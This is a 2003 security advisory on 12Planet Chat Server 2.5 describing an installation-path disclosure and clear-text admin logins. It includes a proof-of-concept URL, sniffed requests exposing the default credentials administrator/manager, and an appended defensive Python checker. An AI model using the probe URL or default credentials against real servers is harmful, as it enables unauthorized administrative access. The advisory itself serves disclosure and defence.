12Planet Chat Server Sends Administrative Password Over the Network in Clear Text
SecurityTracker Alert ID: 1006554
CVE Reference: GENERIC-MAP-NOMATCH
Date: Apr 11 2003
Impact: Disclosure of authentication information, Disclosure of system information, User access via network
Exploit Included: Yes
Vendor Confirmed: Yes
Advisory: Infowarfare.dk
Version(s): 2.5
Description: Dennis Rand at Infowarfare.dk reported two vulnerabilities in the 12Planet Chat Server. A remote user sniffing the network can obtain the administrative password. A remote user can also determine the installation path.
It is reported that the server's login page sends the password to the server in clear text without encryption. This also occurs when a user enters expert mode and changes the administrative password.
A remote user can determine the installation directory with the following type of URL:
http://[target]:8080/qwe/qwe/qwe/index.html
Impact: A remote user with the ability to sniff the network between the administrator and the server can determine the administrator's password.
A remote user can determine the installation path.
Solution: No vendor solution was available at the time of this entry. The vendor has reportedly suggested that customers use an SSL proxy (such as the Apache proxy) to protect administrator login credentials.
Vendor URL: www.12planet.com/en/software/chat/index.html
Cause: Access control error, Exception handling error
Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000), Windows (XP)
Reported By: Dennis Rand <der@infowarfare.dk>
Message History:
None.
Source Message Contents
Date: Fri, 11 Apr 2003 13:21:29 +0200
From: Dennis Rand <der@infowarfare.dk>
Subject: Root directory revealing vulnerability Found in 12Planet Chat Server
Root directory revealing vulnerability
Found in 12Planet Chat Server 2.5
http://www.12planet.com
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
portals willing to offer "sticky" services to their visitors as well
as secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat
conferences by inviting celebrities, experts to talk with visitors and
moderate visitor questions through a moderation process.
It is possible to get the root directory revealed by sending
a specific URL request.
-----[AFFECTED SYSTEMS
Vulnerable systems:
* 12Planet Chat Server 2.5
Immune systems:
*
-----[SEVERITY
Low - An attacker has the possibility to find the location on the server
where the Chat Server is installed.
-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The following transcript demonstrates a sample exploitation of the
vulnerabilities:
-------------------------------------------------------------------
Anything less than 3 times /qwe and you will only get an
HTTP 500 - Internal server error
Proof-Of-Concept exploit:
[Input in browser]
http://vuln-host:8080/qwe/qwe/qwe/index.html
[Output]
Error: 500
Internal Servlet Error:
java.io.IOException: bad path: C:\Program Files\12Planet Chat Server
v2.5.1\www\qwe\qwe\qwe\index.html
at java/io/File.canonPath
at java/io/File.getCanonicalPath
at com/sun/web/core/DefaultServlet.doGet
at javax/servlet/http/HttpServlet.service
at javax/servlet/http/HttpServlet.service
at com/sun/web/core/ServletWrapper.handleRequest
at com/sun/web/core/Context.handleRequest
at com/sun/web/server/ConnectionHandler.run
--------------------------------------------------------------------
-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.
-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress. 12Planet will provide assistance
to all the customers that are interested in the patch
(email to : support@12planet.com)
Best regards, Lei
12Planet
-----[DISCLOSURE TIMELINE
21/02/2003 Found the Vulnerability.
21/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.
-----[ADDITIONAL INFORMATION
The vulnerability was discovered by <der@infowarfare.dk> Dennis Rand
-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages.
-----
Clear text password vulnerability
found in 12Planet Chat Server 2.5
http://www.12planet.com
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
portals willing to offer "sticky" services to their visitors as well
as secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat
conferences by inviting celebrities, experts to talk with visitors and
moderate visitor questions through a moderation process.
When starting the Administration site of the Chat Server the login
and password are sent over the net in clear text.
-----[AFFECTED SYSTEMS
Vulnerable systems:
* 12Planet Chat Server 2.5
Immune systems:
*
-----[SEVERITY
Low/Medium - An attacker is able to put a network sniffer on the
network and sniff the username and password, because
it is sent in a clear text form.
-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
When sending the Administrator password on the login page
the password is sent in clear text.
The same problem exists when you enter expert mode to change
the administrator password: it will again be sent in clear text.
The following transcript demonstrates a sample exploitation of the
vulnerabilities:
-------------------------------------------------------------------
[Used Ethereal to sniff the traffic between the host and server]
LOGIN PAGE:
Here is the capture of the first line of defense from the 12Planet
Chat server:
---------------------------- CUT HERE ----------------------------------------
POST /servlet/one2planet.infolet.InfoServlet HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://193.88.206.253:8080/servlet/one2planet.infolet.InfoServlet?
page=one2planet.community.core.PHLogin&technology=html&domain=default&
language=english&url=%40HTTP%3A%2F%2F193.88.206.253%3A8080%2Fservlet%2
Fone2planet.infolet.InfoServlet%3Fpage%3Done2planet.tools.PSDynPage%21
template%3D%2F12p_template%2Fwww%2Fapps%2Fchatserver%2Fwizard%2Findex.html
Accept-Language: da
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 193.88.206.253:8080
Content-Length: 292
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SESSIONID=To1010mC7187873103878648At
page=one2planet.community.core.PHLogin&table=user&url=@HTTP%3A%2F%2F<vuln-host-ip>%3A8080%2Fservlet%2Fone2planet.infolet.InfoServlet%3Fpage%3Done2planet.tools.PSDynPage%21template%3D%2F12p_template%2Fwww%2Fapps%2Fchatserver%2Fwizard%2Findex.html&vserver=&username=administrator&passwd=manager
---------------------------- CUT HERE ----------------------------------------
ADMINISTRATION PAGE
Now, if the administrator wants to change the password from the default one,
he or she enters expert mode; from within here it is possible to change
the password, but again the password is sent in clear text.
---------------------------- CUT HERE ----------------------------------------
page=one2planet.community.core.PHChangePassword&nickname=administrator&
psswd0=manager&psswd1=Trustno1@&psswd2=Trustno1@&submit3=OK
HTTP/1.0 200 OK
---------------------------- CUT HERE ----------------------------------------
--------------------------------------------------------------------
-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.
-----[WORK AROUNDS
As the vendor writes, they recommend their customers add
an HTTPS layer (through the Apache Proxy feature, for example) to the
administration console for the deployment of production servers.
-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress. We recommend our customers to add
a HTTPS layer (through Apache Proxy feature for example) to the
administration console for the deployment of production servers, this to
solve the second issue you listed. 12Planet will provide assistance to
all the customers that are interested in the patch (email to :
support@12planet.com)
Best regards, Lei
12Planet
-----[DISCLOSURE TIMELINE
24/02/2003 Found the Vulnerability.
25/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.
-----[ADDITIONAL INFORMATION
The vulnerability was discovered by <der@infowarfare.dk> Dennis Rand
-----[DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages.
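As an added defensive example (not part of the advisory above and not the vendor's code), the following Python checks a captured plain-HTTP request for the credential form fields the advisory shows in clear text, and pulls the installation directory out of the "bad path" servlet error described in the first report. The host name, session id and sample messages are constructed placeholders modelled on the captures above.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Form fields the advisory's captures show carrying credentials in clear text.
CREDENTIAL_FIELDS = {"username", "passwd", "psswd0", "psswd1", "psswd2"}
# Signature of the servlet error that discloses the installation directory.
BAD_PATH_RE = re.compile(r"java\.io\.IOException: bad path: ([^\r\n]+)")


def find_cleartext_credentials(raw_request: str) -> dict:
    """Parse one captured HTTP request (plain text, as a sniffer shows it)
    and return the request target plus any credential form fields in the
    body. Anything readable here was, by definition, sent unencrypted."""
    text = raw_request.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    method, target, _ = head.splitlines()[0].split(" ", 2)
    if method.upper() != "POST":
        return {}
    form = parse_qs(body.strip(), keep_blank_values=True)
    leaked = {k: v[0] for k, v in form.items() if k in CREDENTIAL_FIELDS}
    return {"target": target, "fields": leaked} if leaked else {}


def extract_disclosed_path(response_text: str) -> Optional[str]:
    """Return the filesystem path leaked by a 'bad path' servlet error, or None."""
    m = BAD_PATH_RE.search(response_text)
    return m.group(1).strip() if m else None


# Constructed samples modelled on the advisory; host and session id are placeholders.
_LOGIN_BODY = ("page=one2planet.community.core.PHLogin&table=user&vserver="
               "&username=administrator&passwd=manager")
SAMPLE_LOGIN_POST = (
    "POST /servlet/one2planet.infolet.InfoServlet HTTP/1.1\r\n"
    "Host: chat-server.example:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: SESSIONID=PLACEHOLDER\r\n"
    f"Content-Length: {len(_LOGIN_BODY)}\r\n\r\n{_LOGIN_BODY}"
)
SAMPLE_ERROR_RESPONSE = (
    "HTTP/1.0 500 Internal Server Error\r\n\r\nError: 500\r\nInternal Servlet Error:\r\n"
    "java.io.IOException: bad path: C:\\Program Files\\12Planet Chat Server "
    "v2.5.1\\www\\qwe\\qwe\\qwe\\index.html\r\n\tat java/io/File.canonPath\r\n"
)

if __name__ == "__main__":
    print(find_cleartext_credentials(SAMPLE_LOGIN_POST))
    print(extract_disclosed_path(SAMPLE_ERROR_RESPONSE))
```

Feeding real captures to `find_cleartext_credentials` is a quick way to confirm that an HTTPS front-end (the vendor's suggested workaround) is actually in place: once it is, no request to the servlet should be readable on the wire at all.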